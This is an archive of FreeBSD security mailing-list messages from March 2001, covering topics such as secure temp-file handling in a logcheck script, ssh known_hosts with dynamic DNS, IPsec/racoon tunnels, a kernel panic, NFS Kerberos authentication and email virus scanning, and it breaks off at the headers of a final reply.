From owner-freebsd-security Sun Mar 11 15:14:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-158.dsl.lsan03.pacbell.net [63.207.60.158])
by hub.freebsd.org (Postfix) with ESMTP id 19A3B37B718
for <freebsd-security@freebsd.org>; Sun, 11 Mar 2001 15:14:45 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id C67C366F14; Sun, 11 Mar 2001 15:14:44 -0800 (PST)
Date: Sun, 11 Mar 2001 15:14:44 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Greg White <gregw-freebsd-security@greg.cex.ca>
Cc: FreeBSD Security <freebsd-security@freebsd.org>
Subject: Re: temp files for security/logcheck
Message-ID: <20010311151444.A69514@mollari.cthul.hu>
References: <200103110435.f2B4ZHw04676@ns1.unixathome.org>; <20010310234519.A68252@databits.net> <200103110447.f2B4lww04741@ns1.unixathome.org> <20010310225345.A14180@mollari.cthul.hu> <20010310230843.A26101@greg.cex.ca>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="C7zPtVaVf+AK4Oqc"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010310230843.A26101@greg.cex.ca>; from gregw-freebsd-security@greg.cex.ca on Sat, Mar 10, 2001 at 11:08:43PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--C7zPtVaVf+AK4Oqc
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Sat, Mar 10, 2001 at 11:08:43PM -0800, Greg White wrote:
> On Sat, Mar 10, 2001 at 10:53:46PM -0800, Kris Kennaway wrote:
> > On Sun, Mar 11, 2001 at 05:47:58PM +1300, Dan Langille wrote:
> > > AFAIK, the files disappear each time the script is run:
> > >=20
> > > umask 077
> > > rm -f $TMPDIR/check.$$ $TMPDIR/checkoutput.$$=20
> >=20
> > [...]
> >=20
> > Blah, that's an insecure way to create files in $TMPDIR (which is
> > usually /tmp). It needs to use mktemp(1).
> >=20
> > Kris
>=20
> It is in general, but not in this case. The script and the directory are
> mode 0700 -- this makes it difficult for it to be insecure. $TMPDIR is
> explicitly set.
Okay..I was missing context: $TMPDIR is usually inherited from the
user's environment and points to /tmp or whatever their preferred
temporary file directory is.
I don't like the use of /usr/local for temporary file storage -- that
may be on a readonly filesystem. The script needs to use mktemp -d -t
to create itself a secure directory to play in.
Kris
--C7zPtVaVf+AK4Oqc
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rAbkWry0BWjoQKURAmBUAKCWYbz6ncb2+HN7x3IAYoKtO/qQTACgiOuM
9gCN4FYBw/UbhK90b/+ZTkc=
=KwUc
-----END PGP SIGNATURE-----
--C7zPtVaVf+AK4Oqc--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sun Mar 11 16:51: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179])
by hub.freebsd.org (Postfix) with ESMTP id AB1C037B718
for <security@freebsd.org>; Sun, 11 Mar 2001 16:50:58 -0800 (PST)
(envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id TAA00681
for <security@freebsd.org>; Sun, 11 Mar 2001 19:50:53 -0500
Date: Sun, 11 Mar 2001 19:50:53 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: <security@freebsd.org>
Subject: ssh knownhosts ip vs domain name
Message-ID: <Pine.LNX.4.30.0103111944510.519-100000@daedalus.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I have a machine which has a dynamic ip. I use dyndns.org dynamic DNS
service, so when IP on that machine changes name.dyndns.org points to the
new IP. So when I want to ssh to this box, I do ssh name.dyndns.org.
However ssh doesn't put name.dyndns.org into the known_hosts file, but
rather saves the new ip, which is obivousely not what I want.
Is there any way to force it to check by domain name, not by ip?
(I'm using OpenSSH_2.3.0p1)
thanks
mk
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sun Mar 11 17:45:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
by hub.freebsd.org (Postfix) with ESMTP id B2CDE37B718
for <freebsd-security@freebsd.org>; Sun, 11 Mar 2001 17:45:23 -0800 (PST)
(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
by shorty.ahpcns.com (Postfix) with ESMTP id CB3643A4C7
for <freebsd-security@freebsd.org>; Sun, 11 Mar 2001 19:45:20 -0600 (CST)
Message-ID: <3AAC2A30.8DA0061D@ahpcns.com>
Date: Sun, 11 Mar 2001 19:45:20 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Re: IPSEC tunnel & setkey, How do I tell if setkey worked?
References: <3AAB2008.E35A125D@ahpcns.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
jomor wrote:
> I'm finally trying to get a VPN set up between home (DSL) and work
> (T-1). I've been running FreeBSD on my home firewall for a few years and
> now I want it to be an IPSEC tunnel endpoint. The other end will be
> another freeBSD box first, and maybe eventually a Watchguard firebox2
> firewall "appliance". I'm testing off-line for now. I haven't been able
> to find any info on integrating my ipfw rules with the tunnel so I've
> got test boxes set up in an "open" firewall config. I figure I'll get
> the tunnel up first and then break it while I try different ipfw rules.
>
Nevermind... I got it figured out (I think).
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sun Mar 11 20:39:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113])
by hub.freebsd.org (Postfix) with ESMTP
id E510F37B718; Sun, 11 Mar 2001 20:39:18 -0800 (PST)
(envelope-from Bob@Talarian.Com)
Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50])
by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id WAA16567;
Sun, 11 Mar 2001 22:39:17 -0600 (CST)
(envelope-from Bob@Talarian.Com)
Message-ID: <3AAC52F4.1000602@Talarian.Com>
Date: Sun, 11 Mar 2001 22:39:16 -0600
From: Bob Van Valzah <Bob@Talarian.Com>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215
X-Accept-Language: en
MIME-Version: 1.0
To: FreeBSD-Security@FreeBSD.Org
Cc: FreeBSD-Questions@FreeBSD.Org
Subject: Racoon Problem & Cisco Tunnel
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I have several remote FreeBSD users who want to connect their home LANs
to my trusted network over an IPSec tunnel via a DSL connection. I'd
like my end of the tunnel to terminate on a Cisco if possible. (Though I
do have many FreeBSD boxes handy, I just feel better when layer-2
infrastructure doesn't depend on boxes with hard drives.) Any general
advice on how to do this would be appreciated.
As near as I can tell, I have to run racoon and configure it for
pre-shared keys to talk to the cisco. But I don't think the racoon is
even starting right. I get this message: "ERROR:
pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
directory." Happens with the config files I've written and the stock
ones. I'm running a freshly sup'd box with racoon-20010222a built from
ports.
All help and advice appreciated.
Thanks,
Bob
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Sun Mar 11 20:50:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtprelay1.adelphia.net (smtprelay1.adelphia.net [64.8.25.6])
by hub.freebsd.org (Postfix) with ESMTP
id A58A837B719; Sun, 11 Mar 2001 20:50:09 -0800 (PST)
(envelope-from packetwhore@stargate.net)
Received: from pa-westmifflin1a-385.pit.adelphia.net
([24.48.239.129]) by smtprelay1.adelphia.net (Netscape Messaging
Server 4.15) with ESMTP id GA2IQX00.U4C; Sun, 11 Mar 2001 23:49:45 -0500
Date: Sun, 11 Mar 2001 23:42:59 -0500 (EST)
From: pW <packetwhore@stargate.net>
X-X-Sender: <packetwhore@beastie>
To: Bob Van Valzah <Bob@Talarian.Com>
Cc: <FreeBSD-Security@FreeBSD.Org>, <FreeBSD-Questions@FreeBSD.Org>
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: <3AAC52F4.1000602@Talarian.Com>
Message-ID: <Pine.BSF.4.32.0103112341130.11277-100000@beastie>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Out of curiosity...
do your DSL users have public static IPs? I work at an ISP and almost all
of our DSL customers have static private IPs and use NAT for public
ones... just wondering because you may have to enable some sort of NAT
transparency otherwise it may break the VPN...
just a thought...
shawn
On Sun, 11 Mar 2001, Bob Van Valzah wrote:
> I have several remote FreeBSD users who want to connect their home LANs
> to my trusted network over an IPSec tunnel via a DSL connection. I'd
> like my end of the tunnel to terminate on a Cisco if possible. (Though I
> do have many FreeBSD boxes handy, I just feel better when layer-2
> infrastructure doesn't depend on boxes with hard drives.) Any general
> advice on how to do this would be appreciated.
>
> As near as I can tell, I have to run racoon and configure it for
> pre-shared keys to talk to the cisco. But I don't think the racoon is
> even starting right. I get this message: "ERROR:
> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
> directory." Happens with the config files I've written and the stock
> ones. I'm running a freshly sup'd box with racoon-20010222a built from
> ports.
>
> All help and advice appreciated.
>
> Thanks,
>
> Bob
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 1:38:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gyw.com (gyw.com [209.55.67.177])
by hub.freebsd.org (Postfix) with ESMTP id 2B58137B718
for <security@FreeBSD.ORG>; Mon, 12 Mar 2001 01:38:25 -0800 (PST)
(envelope-from tjk@tksoft.com)
Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged))
by gyw.com (8.8.8/8.8.8) with ESMTP id BAA11155;
Mon, 12 Mar 2001 01:54:07 -0800
Received: (from tjk@tksoft.com)
by smtp3.tksoft.com (8.8.8/8.8.8) id BAA18994;
Mon, 12 Mar 2001 01:34:20 -0800
From: "tjk@tksoft.com" <tjk@tksoft.com>
Message-Id: <200103120934.BAA18994@smtp3.tksoft.com>
Subject: Re: ssh knownhosts ip vs domain name
To: meshko@cs.brandeis.edu (Mikhail Kruk)
Date: Mon, 12 Mar 2001 01:34:20 -0800 (PST)
Cc: security@FreeBSD.ORG
In-Reply-To: <Pine.LNX.4.30.0103111944510.519-100000@daedalus.cs.brandeis.edu> from "Mikhail Kruk" at Mar 11, 2001 07:50:53 PM
X-Info: None
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Edit the known_hosts file by hand.
Troy
>
> I have a machine which has a dynamic ip. I use dyndns.org dynamic DNS
> service, so when IP on that machine changes name.dyndns.org points to the
> new IP. So when I want to ssh to this box, I do ssh name.dyndns.org.
> However ssh doesn't put name.dyndns.org into the known_hosts file, but
> rather saves the new ip, which is obivousely not what I want.
> Is there any way to force it to check by domain name, not by ip?
>
> (I'm using OpenSSH_2.3.0p1)
>
> thanks
> mk
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 2: 4:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp12.singnet.com.sg (smtp12.singnet.com.sg [165.21.6.32])
by hub.freebsd.org (Postfix) with ESMTP id C878437B718
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 02:04:39 -0800 (PST)
(envelope-from spades@galaxynet.org)
Received: from bryan (ad202.166.105.169.magix.com.sg [202.166.105.169])
by smtp12.singnet.com.sg (8.11.2/8.11.2) with SMTP id f2CA4dC02444
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 18:04:39 +0800 (SGT)
Message-Id: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
X-Sender: spades@smtp.magix.com.sg
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Mon, 12 Mar 2001 18:14:08 +0800
To: freebsd-security@freebsd.org
From: Spades <spades@galaxynet.org>
Subject: rebooting error
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
What kinda error gives this?
> Fatal trap 12: page fault while in kernel mode
> fault virtual address = 0xbffa6a40
> fault code = supervisor write, page not present
> instruction pointer = 0x8:0xc03093a1
> stack pointer = 0x10:0xd6398c7c
> frame pointer = 0x10:0xd6398c7c
> code segment = base 0x0, limit 0xfffff, type 0x1b
> = DPL 0, pres 1, def32 1, gran 1
> processor eflags = interrupt enabled, resume, IOPL = 0
> current process = 45257 (gcc)
> interrupt mask = bio
> trap number = 12
> panic: page fault
>
> syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132
132 132 132 132
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 2:56:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id 259D037B718
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 02:56:14 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 5829 invoked by uid 1000); 12 Mar 2001 10:55:37 -0000
Date: Mon, 12 Mar 2001 12:55:37 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Spades <spades@galaxynet.org>
Cc: freebsd-security@freebsd.org
Subject: Re: rebooting error
Message-ID: <20010312125537.A469@ringworld.oblivion.bg>
Mail-Followup-To: Spades <spades@galaxynet.org>,
freebsd-security@freebsd.org
References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>; from spades@galaxynet.org on Mon, Mar 12, 2001 at 06:14:08PM +0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, Mar 12, 2001 at 06:14:08PM +0800, Spades wrote:
> What kinda error gives this?
Only you can tell us that; look at
http://www.FreeBSD.org/handbook/kerneldebug.html for a start :)
G'luck,
Peter
--
This sentence contains exactly threee erors.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 8: 8: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113])
by hub.freebsd.org (Postfix) with ESMTP
id 6256937B719; Mon, 12 Mar 2001 08:08:01 -0800 (PST)
(envelope-from Bob@Talarian.Com)
Received: from Talarian.Com (NewStorm.whitebarn.com [216.0.13.77])
by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id KAA22877;
Mon, 12 Mar 2001 10:07:58 -0600 (CST)
(envelope-from Bob@Talarian.Com)
Message-ID: <3AACF40D.4080504@Talarian.Com>
Date: Mon, 12 Mar 2001 10:06:37 -0600
From: Bob Van Valzah <Bob@Talarian.Com>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215
X-Accept-Language: en
MIME-Version: 1.0
To: pW <packetwhore@stargate.net>
Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org
Subject: Re: Racoon Problem & Cisco Tunnel
References: <Pine.BSF.4.32.0103112341130.11277-100000@beastie>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Yes. The five DSL setups with which I'm familiar all grant at least one
public address per house. I believe all are static, but one might be
dynamic. Interference with protocols like IPSec is one of the reasons
why I'd make a public address a requirement when choising a DSL
provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
possible. Let's hasten the deployment of IPv6.
Bob
pW wrote:
> Out of curiosity...
> do your DSL users have public static IPs? I work at an ISP and almost all
> of our DSL customers have static private IPs and use NAT for public
> ones... just wondering because you may have to enable some sort of NAT
> transparency otherwise it may break the VPN...
>
> just a thought...
>
> shawn
>
> On Sun, 11 Mar 2001, Bob Van Valzah wrote:
>
>> I have several remote FreeBSD users who want to connect their home LANs
>> to my trusted network over an IPSec tunnel via a DSL connection. I'd
>> like my end of the tunnel to terminate on a Cisco if possible. (Though I
>> do have many FreeBSD boxes handy, I just feel better when layer-2
>> infrastructure doesn't depend on boxes with hard drives.) Any general
>> advice on how to do this would be appreciated.
>>
>> As near as I can tell, I have to run racoon and configure it for
>> pre-shared keys to talk to the cisco. But I don't think the racoon is
>> even starting right. I get this message: "ERROR:
>> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
>> directory." Happens with the config files I've written and the stock
>> ones. I'm running a freshly sup'd box with racoon-20010222a built from
>> ports.
>>
>> All help and advice appreciated.
>>
>> Thanks,
>>
>> Bob
>>
>>
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-security" in the body of the message
>>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 10:13:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88])
by hub.freebsd.org (Postfix) with ESMTP id 1B0D737B719
for <freebsd-security@FreeBSD.org>; Mon, 12 Mar 2001 10:13:06 -0800 (PST)
(envelope-from jhb@FreeBSD.org)
Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241])
by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f2CICwA80390;
Mon, 12 Mar 2001 10:12:58 -0800 (PST)
(envelope-from jhb@FreeBSD.org)
Message-ID: <XFMail.010312101238.jhb@FreeBSD.org>
X-Mailer: XFMail 1.4.0 on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
Date: Mon, 12 Mar 2001 10:12:38 -0800 (PST)
From: John Baldwin <jhb@FreeBSD.org>
To: Spades <spades@galaxynet.org>
Subject: RE: rebooting error
Cc: freebsd-security@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On 12-Mar-01 Spades wrote:
> What kinda error gives this?
Either a bug in the kernel, or possibly bad hardware (could be bad memory,
disk, CPU, etc.). Can you reproduce it, and is it always the same set of
messages?
>> Fatal trap 12: page fault while in kernel mode
>> fault virtual address = 0xbffa6a40
>> fault code = supervisor write, page not present
>> instruction pointer = 0x8:0xc03093a1
>> stack pointer = 0x10:0xd6398c7c
>> frame pointer = 0x10:0xd6398c7c
>> code segment = base 0x0, limit 0xfffff, type 0x1b
>> = DPL 0, pres 1, def32 1, gran 1
>> processor eflags = interrupt enabled, resume, IOPL = 0
>> current process = 45257 (gcc)
>> interrupt mask = bio
>> trap number = 12
>> panic: page fault
>>
>> syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132
> 132 132 132 132
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
--
John Baldwin <jhb@FreeBSD.org> -- http://www.FreeBSD.org/~jhb/
PGP Key: http://www.baldwin.cx/~john/pgpkey.asc
"Power Users Use the Power to Serve!" - http://www.FreeBSD.org/
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 10:19:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from polaris.we.lc.ehu.es (polaris.we.lc.ehu.es [158.227.6.43])
by hub.freebsd.org (Postfix) with ESMTP id 050D237B718
for <security@FreeBSD.org>; Mon, 12 Mar 2001 10:19:32 -0800 (PST)
(envelope-from jose@we.lc.ehu.es)
Received: from v-ger.we.lc.ehu.es (v-ger [158.227.6.179])
by polaris.we.lc.ehu.es (8.11.1/8.11.1) with ESMTP id f2CIJT906785
for <security@FreeBSD.org>; Mon, 12 Mar 2001 19:19:29 +0100 (MET)
Received: from we.lc.ehu.es (localhost [127.0.0.1])
by v-ger.we.lc.ehu.es (8.11.1/8.11.1) with ESMTP id f2CHvr700734
for <security@FreeBSD.org>; Mon, 12 Mar 2001 18:57:53 +0100 (CET)
(envelope-from jose@we.lc.ehu.es)
Message-ID: <3AAD0E21.4EDB1E4C@we.lc.ehu.es>
Date: Mon, 12 Mar 2001 18:57:53 +0100
From: "Jose M. Alcaide" <jose@we.lc.ehu.es>
Organization: Universidad del Pais Vasco - Dpto. de Electricidad y Electronica
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: es-ES, es, en-US, en
MIME-Version: 1.0
To: security@FreeBSD.org
Subject: NFS and kerberos?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hello,
I want to authenticate NFS clients on an NFS server (all of them running
FreeBSD 4.3). I found that SecureRPC is not an option, but I also found
the "-kerb" flag in exports(5). However, the manpage says:
The -kerb option specifies that the Kerberos authentication server should
be used to authenticate and map client credentials. This option requires
that the kernel be built with the NFSKERB option. The use of this option
will prevent the kernel from compiling unless calls to the appropriate
Kerberos encryption routines are provided in the NFS source.
I searched sys/nfs/* for NFSKERB and indeed I found some "XXX" placeholders
parenthesized by "#ifdef NFSKERB" for -I think- those calls to the Kerberos
encryption routines. Obviously the kernel cannot be compiled if NFSKERB
is #define'd.
My question is: can I use kerberos for NFS client authentication? If
I cannot, then I'll welcome any suggestions about how to share file
systems with authenticated clients.
TIA,
-- JMA
****** Jose M. Alcaide // jose@we.lc.ehu.es // jmas@FreeBSD.org ******
** "Beware of Programmers who carry screwdrivers" -- Leonard Brandwein **
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 13:59:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170])
by hub.freebsd.org (Postfix) with ESMTP id 4613037B719
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 13:59:31 -0800 (PST)
(envelope-from mit@mitayai.net)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199])
by castle.dreaming.org (8.11.2/8.11.2) with SMTP id f2CLxUe14305
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 16:59:30 -0500 (EST)
(envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
To: <freebsd-security@freebsd.org>
Subject: Virus Scanning Software for FreeBSD
Date: Mon, 12 Mar 2001 16:56:43 -0500
Message-ID: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0019_01C0AB15.6AA82040"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
This is a multi-part message in MIME format.
------=_NextPart_000_0019_01C0AB15.6AA82040
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Is anyone aware of any virus scanning solutions for freebsd, particularly
solutions for email? I don;t trust my users not to follow proper email
guidelines, and thus would like to stop email at the server before they get
delivered the message.
Regards,
Mit
--
Will Mitayai Keeso Rowe
For full contact information, please visit:
http://my.infotriever.com/mitayai
------=_NextPart_000_0019_01C0AB15.6AA82040
Content-Type: text/x-vcard;
name="Will Mitayai Keeso Rowe.vcf"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="Will Mitayai Keeso Rowe.vcf"
BEGIN:VCARD
VERSION:2.1
N:Rowe;Will;Mitayai Keeso
FN:Will Mitayai Keeso Rowe
NICKNAME:Mitayai
ORG:Mitayai.Net
TITLE:President
NOTE:=20
TEL;WORK;VOICE:(416) 934-9404
TEL;HOME;VOICE:(416) 934-0349
TEL;CELL;VOICE:(416) 561-1616
TEL;WORK;FAX:(253) 541-9915
ADR;WORK:;;#9-552 Church Street;Toronto;ON;M4Y 2E4;Canada
LABEL;WORK;ENCODING=3DQUOTED-PRINTABLE:#9-552 Church =
Street=3D0D=3D0AToronto, ON M4Y 2E4=3D0D=3D0ACanada
ADR;HOME:;;;;;;Canada
LABEL;HOME:Canada
URL:http://www.mitayai.net/
BDAY:19701012
EMAIL;PREF;INTERNET:mit@mitayai.net
REV:20010224T192609Z
END:VCARD
------=_NextPart_000_0019_01C0AB15.6AA82040--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14: 4:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from rapidnet.com (rapidnet.com [205.164.216.1])
by hub.freebsd.org (Postfix) with ESMTP id 6BD3C37B718
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:04:52 -0800 (PST)
(envelope-from traviso@RapidNet.com)
Received: from localhost (traviso@localhost)
by rapidnet.com (8.9.3/8.9.3) with ESMTP id PAA76524;
Mon, 12 Mar 2001 15:04:48 -0700 (MST)
Date: Mon, 12 Mar 2001 15:04:48 -0700 (MST)
From: "Travis [Admin Team]" <traviso@RapidNet.com>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Message-ID: <Pine.BSF.4.21.0103121504090.9893-100000@rapidnet.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don;t trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
Greetings Mit, check out the ports collections - I believe there
are two and one front end. To be sure go to freebsd.org and click on
ported applications - search for virus.
Travis
/*
-=[ Travis Ogden ]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RapidNet Admin Team "Courage is not defined by those who
Phone#: 605.341.3283 fought and did not fall, but by those
ICQ#: 30220771 who fought, fell, and rose again."
Mail: traviso@RapidNet.com Fax#: 605.348.1031
Web: www.RapidNet.com/~traviso 800#: 800.763.2525
ATTENTION! "RapidNet has moved to 330 Knollwood Drive,
Rapid City, SD 57701."
-=-=-=-=-=-=-=-=-=-=-=-=-=-[ traviso@rapidnet.com ]=-=-=-=-=
*/
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14: 9:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4])
by hub.freebsd.org (Postfix) with ESMTP id C7A9937B719
for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 14:09:18 -0800 (PST)
(envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost)
by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2CM91077302;
Mon, 12 Mar 2001 17:09:01 -0500 (EST)
(envelope-from rsimmons@wlcg.com)
Date: Mon, 12 Mar 2001 17:08:57 -0500 (EST)
From: Rob Simmons <rsimmons@wlcg.com>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Virus Scanning Software for FreeBSD
